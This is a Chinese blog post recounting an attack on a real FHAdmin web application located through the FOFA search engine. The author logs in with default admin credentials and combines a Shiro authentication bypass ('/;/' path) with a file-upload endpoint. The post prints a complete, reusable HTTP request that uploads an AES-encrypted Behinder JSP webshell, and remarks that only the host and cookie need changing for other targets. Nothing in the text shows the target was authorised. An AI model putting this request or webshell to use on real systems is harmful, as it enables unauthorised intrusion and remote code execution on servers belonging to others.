又是一个愉快的摸鱼的一天,闲来无事去逛先知社区突然看到了一篇名为shrio权限实战绕过的文章(https://xz.aliyun.com/t/8311),这时不禁突然 回想起来之前看到过的一个微信公众号文章那夜我做了个梦,差点我就相信了

于是便开启了新一轮的探索,我们可以去fofa去查找 intitle:FHAdmin,当然我之前是搜索过的所以在我打开搜索框输入 fh的一刹那便出现了我要的网站。

下面开始正式实战

这是我们的目标网站:

 

 

结合先知社区中看到的登录框图片:

真的是出人意料的相似啊,有木有.

当然在做这个实验的时候我们还是要先验证是否存在shiro漏洞的。

当然文章中说是额米有爆破出来密码的但是,我之前看过的微信文章之后是知道存在 管理员账号密码的 :admin/1

再记住密码的情况下

好家伙直接cookie明文传输密码。

OK,接下来就按照文章中的构造吧

发现上传成功,但是居然找不到文件。

于是接着看,文章中再上传点需要请求参数?uploadPath=/plugins/uploadify/

/;/plugins/uploadify/uploadFile.jsp?uploadPath=/plugins/uploadify/

当然 在我在实验中还遇到了其他的问题,那就是光照猫画虎,没有注意到需要构造完整的文件上传包了,有点憨批了。

完整的如下截图:

POST /;/plugins/uploadify/uploadFile.jsp?uploadPath=/plugins/uploadify/ HTTP/1.1

Host: x.x.x.x

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:81.0) Gecko/20100101 Firefox/81.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Content-Type: multipart/form-data; boundary=---------------------------1873137538776189788600609431

Content-Length: 772

Connection: close

Cookie: JSESSIONID=587CDE2437A0AE2C40FB25DE5D71339C

Upgrade-Insecure-Requests: 1

DNT: 1

X-Forwarded-For: 127.0.0.1

-----------------------------1873137538776189788600609431

Content-Disposition: form-data; name="imgFile"; filename="shell.jsp"

Content-Type: application/octet-stream

AAAAA<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>bbbb

-----------------------------1873137538776189788600609431

【其他类似的情况下只需要修改 host以及cookie就可以了】,这里我用的冰蝎,走起直接上传webshell。

最新文章

  1. Python之路-python(css布局、JavaScript)
  2. 谈MongoDB读取连接超时的异常
  3. GMM算法k-means算法的比较
  4. Intel Visual Fortran Compiler 11调用lapack库实现并行多处理计算
  5. 设置UISegmentedControl中字体大小
  6. Elipse安装Spring Tool Suite
  7. Linux下的grep搜索命令详解(一)
  8. 应用Java泛型和反射导出CSV文件
  9. Android(java)学习笔记109:通过反射获取成员变量和成员方法并且使用
  10. swift学习之一致性hash
  11. windows下安装php真正的多线程扩展pthreads教程
  12. JqueryAjax异步加载在ASP.NET
  13. Python的列表
  14. jquery提供的插件无法删除cookie的解决办法
  15. LightOJ1336 Sigma Function
  16. 阿里云安装MySQL5.7
  17. Windows服务器上使用phpstudy部署PHP程序
  18. SDN 实验室学生们
  19. Java抽象类应用—模板方法模式
  20. Azure 中 Windows 虚拟机的大小

热门文章

  1. css设置背景图(背景图太大导致图片显示不全)
  2. k8s_使用k8s部署wordpress博客系统(一)
  3. 面试官:来说说 https 和 http 区别?
  4. Python学习笔记文件读写之生成随机的测试试卷文件
  5. nginx4层代理ssh服务
  6. 在datagridview中首列添加复选框
  7. PR / PO审批
  8. Webservice EASLogin登录接口说明
  9. mysql 创建表 datetime NOT NULL DEFAULT &#39;0000-00-00 00:00:00&#39; 默认值失败
  10. 面试视频知识点整理1-12(渲染机制,js运行机制,页面性能,错误监控)